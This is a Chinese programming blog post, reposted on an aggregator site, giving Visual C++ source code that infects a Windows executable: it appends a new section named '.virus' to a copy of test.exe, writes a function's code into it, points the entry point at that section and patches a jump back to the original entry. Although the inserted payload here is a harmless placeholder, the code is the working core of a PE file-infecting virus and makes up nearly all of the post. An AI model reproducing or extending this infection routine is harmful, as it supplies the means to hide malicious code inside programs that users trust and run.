现在的位置: 首页 > 综合 > 正文

基于visual c++之windows核心编程代码分析(64)现有的exe文件中添加自己的代码

2013年01月13日 ⁄ 综合 ⁄ 共 10284字 ⁄ 字号 评论关闭

我们进行信息安全编程的时候,经常需要向exe文件插入自己的源代码,

我们如何在代码中实现呢。请见代码与注释讲解

[cpp]
view plaincopyprint?
  1. #include <iostream.h> 
  2. #include <windows.h> 
  3. #include <stdio.h> 
  4.  
  5. ////////////////////////////////////////////////////////////////////////// 
  6. //******************************************************************* 
  7. //*******以下为程序代码******* 
  8. //******************************************************************* 
  9. ////////////////////////////////////////////////////////////////////////// 
  10. void VirusCode() 
  12.     _asm  
  13.     { 
  14.         mov eax , 5 
  15.     } 
  16.  
  17.     return
  19.  
  20.  
  21.  
  22. ////////////////////////////////////////////////////////////////////////// 
  23. //******************************************************************* 
  24. //*******主函数******* 
  25. //******************************************************************* 
  26. ////////////////////////////////////////////////////////////////////////// 
  27. void main() 
  29. //******************************************************************* 
  30. //*******首先得到程序代码起始地址,结束地址,代码长度******* 
  31. //******************************************************************* 
  32.     ///////////////////////////////////////////////////////////////// 
  33.     //  *******变量说明******* 
  34.     //  **dwFunBegAddr  :程序函数的开始地址 
  35.     //  **dwFunEndAddr  :程序函数的结束地址 
  36.     //  **dwFunCodeLen  :程序代码长度 
  37.     //  **dwJmpOff      :程序函数jmp区到真正入口的偏移 
  38.     //  **pMove         :临时的指针变量 
  39.     ///////////////////////////////////////////////////////////////// 
  40.     DWORD dwFunBegAddr , dwJmpOff , dwFunEndAddr , dwFunCodeLen; 
  41.     PBYTE pMove = NULL; 
  42.      
  43.     //  *******首先指向程序函数的jmp指令******* 
  44.     pMove = (PBYTE)VirusCode; 
  45.      
  46.     cout << "函数的jmp地址为:" << (PVOID)pMove << endl; 
  47.     //  *******定位到jmp后面的偏移处******* 
  48.     pMove ++; 
  49.  
  50.     //  *******把偏移赋值给变量******* 
  51.     dwJmpOff = *((PDWORD)pMove); 
  52.  
  53.     //  *******jmp下一条指令的地址(code + 5)+偏移得到函数真正的入口地址******* 
  54.     dwFunBegAddr = (DWORD)VirusCode + 5 + dwJmpOff; 
  55.  
  56.     cout << "函数jmp的跳转偏移为:" <<(PVOID)dwJmpOff << endl; 
  57.     cout << "开始地址为:" << (PVOID)dwFunBegAddr << endl; 
  58.      
  59.     //  *******以下通过搜索得到函数的结束地址******* 
  60.     //  *******首先把函数的入口地址赋给变量******* 
  61.     pMove = (PBYTE)dwFunBegAddr; 
  62.  
  63.     //  *******向后搜索,直到结尾******* 
  64.     while (!((*(pMove + 1) == 0xc3) && (*pMove == 0x5D) && (*(pMove - 1) == 0xE5))) 
  65.     { 
  66.         pMove ++; 
  67.     } 
  68.  
  69.     //  *******此时pMove指向ret前一条指令******* 
  70.     //  *******pMove向后移5个字节,为程序代码的jmp指令占位******* 
  71.     pMove +=5; 
  72.     dwFunEndAddr = (DWORD)pMove; 
  73.  
  74.  
  75.     cout << "代码结束地址为:" << (PVOID)dwFunEndAddr << endl; 
  76.  
  77.     //  *******结束地址减去起始地址,得到代码长度******* 
  78.     dwFunCodeLen = dwFunEndAddr - dwFunBegAddr; 
  79.  
  80.     cout << "总代码长度为:" << (int)dwFunCodeLen << endl; 
  81.  
  82. //******************************************************************* 
  83. //*******以下为在exe文件中添加程序代码******* 
  84. //******************************************************************* 
  85.     HANDLE hFile , hMapFile; 
  86.     LPVOID pMapOfFile = NULL; 
  87.      
  88. //******************************************************************* 
  89. //*******检测文件合法性******* 
  90. //******************************************************************* 
  91.     //  *******打开文件******* 
  92.     hFile = CreateFile("test.exe" , GENERIC_READ , FILE_SHARE_READ |  
  93.             FILE_SHARE_WRITE , NULL , OPEN_EXISTING , FILE_ATTRIBUTE_ARCHIVE , NULL); 
  94.  
  95.     if (INVALID_HANDLE_VALUE == hFile) 
  96.     { 
  97.         cout << "CreateFile Error!" << endl; 
  98.         return
  99.     } 
  100.  
  101.     //  *******创建文件映射******* 
  102.     hMapFile = CreateFileMapping(hFile , NULL , PAGE_READONLY , 0 , 0 , NULL); 
  103.  
  104.     if (!hMapFile) 
  105.     { 
  106.         cout << "CreateFileMapping Error!" << endl; 
  107.         goto CLOSEFILEHANDLE; 
  108.     } 
  109.  
  110.     //  *******把文件映射到内存中******* 
  111.     pMapOfFile = MapViewOfFile(hMapFile , FILE_MAP_READ , 0 , 0 , 0); 
  112.  
  113.     if (!pMapOfFile) 
  114.     { 
  115.         cout << "MapViewOfFile Error!" << endl; 
  116.         goto CLOSEMAPHANDLE; 
  117.     } 
  118.  
  119.     IMAGE_DOS_HEADER *pDosHeader; 
  120.  
  121.     //  ********检测DOS文件头******* 
  122.     pDosHeader = ( IMAGE_DOS_HEADER* )pMapOfFile; 
  123.  
  124.     if(pDosHeader->e_magic != IMAGE_DOS_SIGNATURE) 
  125.     { 
  126.         cout << "Check Dos Header Error!" << endl; 
  127.         goto FreeViewOfMap; 
  128.     } 
  129.  
  130.     IMAGE_NT_HEADERS *pNtHeader; 
  131.  
  132.     //  *******检测NT文件头******* 
  133.     pNtHeader = (IMAGE_NT_HEADERS*)((PBYTE)pDosHeader + pDosHeader->e_lfanew); 
  134.  
  135.     if (pNtHeader->Signature != IMAGE_NT_SIGNATURE) 
  136.     { 
  137.         cout << "Check NT Header Error!" << endl; 
  138.         goto FreeViewOfMap; 
  139.     } 
  140. //*************************************************************** 
  141. //*******准备工作******* 
  142. //*************************************************************** 
  143.     BOOL bCopy; 
  144.  
  145.     //  *******首先把要添加程序代码的文件复制一份******* 
  146.     bCopy = CopyFile("test.exe" ,
    "test_virus.exe" , FALSE); 
  147.     if (!bCopy) 
  148.     { 
  149.         cout << "CopyFile Error!" << endl; 
  150.     } 
  151.  
  152.     HANDLE hNewFile; 
  153.  
  154.     //  *******打开刚刚复制的文件******* 
  155.     hNewFile = CreateFile("test_virus.exe" , GENERIC_READ | GENERIC_WRITE,FILE_SHARE_READ  
  156.                 | FILE_SHARE_WRITE , NULL , OPEN_EXISTING , FILE_ATTRIBUTE_ARCHIVE , NULL); 
  157.  
  158.     if (!hNewFile) 
  159.     { 
  160.         cout << "CreateFile Error!" << endl; 
  161.         goto FreeViewOfMap; 
  162.     } 
  163.  
  164.     HGLOBAL pNewFileHeader; 
  165.  
  166.     //  *******为新文件的文件头申请一块内存,用于修改文件头信息******* 
  167.     pNewFileHeader = GlobalAlloc(GPTR , pNtHeader->OptionalHeader.SizeOfHeaders); 
  168.  
  169.     if (!pNewFileHeader) 
  170.     { 
  171.         cout << "GlobalAlloc Error!" << endl; 
  172.         goto CloseNewFileHandle; 
  173.     } 
  174.  
  175.     //  *******用原文件头填充这块内存******* 
  176.     RtlMoveMemory((PVOID)pNewFileHeader , (PVOID)pMapOfFile , pNtHeader->OptionalHeader.SizeOfHeaders); 
  177.  
  178.     IMAGE_NT_HEADERS *pNewFileNtHeader; 
  179.  
  180.     pNewFileNtHeader = (IMAGE_NT_HEADERS*)((PBYTE)pNewFileHeader + pDosHeader->e_lfanew); 
  181.  
  182. ////////////////////////////////////////////////////////////////////////// 
  183. //*******此时的指针信息******* 
  184. //*******pMapOfFile         :   原映射文件的开始 
  185. //*******pDosHeader         :   原映射文件的DOS头也就是文件开始,只不过类型不一样 
  186. //*******pNTHeader          :   原映射文件的NT头 
  187. //*******pNewFileHeader     :   新文件的开始 
  188. //*******pNewFileNtHeader   :   新文件的NT头 
  189. ////////////////////////////////////////////////////////////////////////// 
  190. //**************************************************************** 
  191. //*******修改新文件的节表信息******* 
  192. //**************************************************************** 
  193.     int nSecNum; 
  194.     nSecNum = pNtHeader->FileHeader.NumberOfSections; 
  195.     IMAGE_SECTION_HEADER *pLastSec , *pNewSec; 
  196.  
  197.     //  *******定位到原文件中的最后一个节表******* 
  198.     pLastSec = (IMAGE_SECTION_HEADER*)((PBYTE)pNewFileNtHeader +
    sizeof(IMAGE_NT_HEADERS) 
  199.                 + (nSecNum-1) * sizeof(IMAGE_SECTION_HEADER)); 
  200.  
  201.     //  *******pNewSec为最后一个节表的结尾处,也就是新加节表的开头******* 
  202.     pNewSec = pLastSec + 1; 
  203.  
  204.     //*******修改新增节表的相关信息******* 
  205.     //*****节表总数加1***** 
  206.     pNewFileNtHeader->FileHeader.NumberOfSections ++; 
  207.  
  208.     //*****修改新节的文件偏移***** 
  209.     pNewSec->PointerToRawData = pLastSec->PointerToRawData + pLastSec->SizeOfRawData; 
  210.  
  211.     //*****修改新节的文件尺寸***** 
  212.     int nAlignNum; 
  213.  
  214.     nAlignNum = dwFunCodeLen / pNewFileNtHeader->OptionalHeader.FileAlignment; 
  215.     if (dwFunCodeLen % pNewFileNtHeader->OptionalHeader.FileAlignment != 0) 
  216.     { 
  217.         nAlignNum++; 
  218.     } 
  219.     pNewSec->SizeOfRawData = nAlignNum * pNewFileNtHeader->OptionalHeader.FileAlignment; 
  220.  
  221.     //*****修改所有代码长度按内存页对齐后的大小***** 
  222.     nAlignNum = dwFunCodeLen / pNewFileNtHeader->OptionalHeader.SectionAlignment; 
  223.     if (dwFunCodeLen % pNewFileNtHeader->OptionalHeader.SectionAlignment != 0) 
  224.     { 
  225.         nAlignNum ++; 
  226.     } 
  227.     pNewFileNtHeader->OptionalHeader.SizeOfCode += nAlignNum *  
  228.                         pNewFileNtHeader->OptionalHeader.SectionAlignment; 
  229.  
  230.     //*****修改文件内存映像尺寸***** 
  231.     pNewFileNtHeader->OptionalHeader.SizeOfImage += nAlignNum *  
  232.                         pNewFileNtHeader->OptionalHeader.SectionAlignment; 
  233.  
  234.     //*****修改新节的内存偏移量***** 
  235.     //*****用原最后节的内存偏移加上原最后节对齐后的内存尺寸的大小***** 
  236.     nAlignNum = pLastSec->Misc.VirtualSize /  
  237.                 pNewFileNtHeader->OptionalHeader.SectionAlignment; 
  238.     if (pLastSec->Misc.VirtualSize % pNewFileNtHeader->OptionalHeader.SectionAlignment != 0) 
  239.     { 
  240.         nAlignNum ++; 
  241.     } 
  242.     pNewSec->VirtualAddress = nAlignNum * pNewFileNtHeader->OptionalHeader.SectionAlignment + 
  243.                                 pLastSec->VirtualAddress; 
  244.  
  245.     //*****修改新节的内存尺寸***** 
  246.     pNewSec->Misc.VirtualSize = dwFunCodeLen; 
  247.  
  248.     //*****更新新节属性***** 
  249.     pNewSec->Characteristics = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE |  
  250.                     IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE; 
  251.  
  252.     //*****更新节名***** 
  253.     strcpy((char*)pNewSec->Name ,
    ".virus"); 
  254.  
  255.     //*****更新入口地址***** 
  256.  
  257.     pNewFileNtHeader->OptionalHeader.AddressOfEntryPoint = pNewSec->VirtualAddress; 
  258.  
  259.     BOOL bWrite; 
  260.     DWORD dwHeaderSize , dwWriten; 
  261.     dwHeaderSize = (DWORD)(pNewFileNtHeader->OptionalHeader.SizeOfHeaders); 
  262.     bWrite = WriteFile(hNewFile , (LPVOID)pNewFileHeader , dwHeaderSize , &dwWriten , NULL); 
  263.  
  264.     //*****向文件中添加程序代码***** 
  265.     DWORD dwSetFileP; 
  266.  
  267.     //*****定位到新文件中新节开始处***** 
  268.     dwSetFileP = SetFilePointer(hNewFile , pNewSec->PointerToRawData , NULL , FILE_BEGIN); 
  269.     if (!dwSetFileP) 
  270.     { 
  271.         cout << "SetFilePointer Error!" << endl; 
  272.         goto CloseNewFileHandle; 
  273.     } 
  274.  
  275.     //*****写入程序代码***** 
  276.     bWrite = WriteFile(hNewFile , (LPVOID)dwFunBegAddr , dwFunCodeLen , &dwWriten , NULL); 
  277.     if (!bWrite) 
  278.     { 
  279.         cout << "Write Virus Code Error!" << endl; 
  280.         goto CloseNewFileHandle; 
  281.     } 
  282.  
  283.     //*****定位到文件尾部***** 
  284.     dwSetFileP = SetFilePointer(hNewFile , pNewSec->PointerToRawData +  
  285.                     pNewSec->SizeOfRawData , NULL , FILE_BEGIN); 
  286.     if (!dwSetFileP) 
  287.     { 
  288.         cout << "SetFilePointer End Error!" << endl; 
  289.         goto CloseNewFileHandle; 
  290.     } 
  291.  
  292.     //*****设定文件结束***** 
  293.     if (!SetEndOfFile(hNewFile)) 
  294.     { 
  295.         cout << "SetEndOfFile Error!" << endl; 
  296.         goto CloseNewFileHandle; 
  297.     } 
  298.  
  299.     //*******修正原入口地址******* 
  300.     PBYTE pModifyAddr; 
  301.     pModifyAddr = (PBYTE)pNewSec->VirtualAddress; 
  302.  
  303.     pModifyAddr += dwFunCodeLen; 
  304.     //printf("%x\n" , pModifyAddr); 
  305.  
  306.     int nSub;    //跳转的距离 
  307.     nSub = (PBYTE)(pNtHeader->OptionalHeader.AddressOfEntryPoint) - pModifyAddr; 
  308.  
  309.     DWORD dwModifyLoca; 
  310.     dwModifyLoca = pNewSec->PointerToRawData; 
  311.     dwModifyLoca = dwModifyLoca + dwFunCodeLen - 5; 
  312.     //dwModifyLoca ++; 
  313.  
  314.     //  *****定位到程序代码最后的五个字节处***** 
  315.     dwSetFileP = SetFilePointer(hNewFile , dwModifyLoca , NULL , FILE_BEGIN); 
  316.     if (!dwSetFileP) 
  317.     { 
  318.         cout << "Modify Address SetFilePointer Error!" << endl; 
  319.         goto CloseNewFileHandle; 
  320.     } 
  321.     //*****修正jmp指令***** 
  322.     BYTE bJmp; 
  323.     bJmp = 0XE9; 
  324.     bWrite = WriteFile(hNewFile , &bJmp , 1 , &dwWriten , NULL); 
  325.     if (!bWrite) 
  326.     { 
  327.         cout << "Modify Address WriteFile Error!" << endl; 
  328.         goto CloseNewFileHandle; 
  329.     } 
  330.     //*****修正跳转地址***** 
  331.     bWrite = WriteFile(hNewFile , &nSub , 4 , &dwWriten , NULL); 
  332.     if (!bWrite) 
  333.     { 
  334.         cout << "Modify Address WriteFile Error!" << endl; 
  335.         goto CloseNewFileHandle; 
  336.     } 
  337.  
  338.  
  339. //**************************************************************** 
  340. //*******扫尾工作******* 
  341. //**************************************************************** 
  342. CloseNewFileHandle: 
  343.     CloseHandle(hNewFile); 
  344. FreeViewOfMap: 
  345.     UnmapViewOfFile(pMapOfFile); 
  346. CLOSEMAPHANDLE: 
  347.     CloseHandle(hMapFile); 
  348. CLOSEFILEHANDLE: 
  349.     CloseHandle(hFile); 

原文地址:http://blog.csdn.net/yincheng01/article/details/7214472

返回
【上篇】
【下篇】

作者:

抱歉!评论已关闭.

返回首页

Copyright © 2013-2018 学步园  保留所有权利.
软文销售 QQ客服:2265327166 点击这里给我发消息(其他合作也可洽谈)
必威体育
必威电竞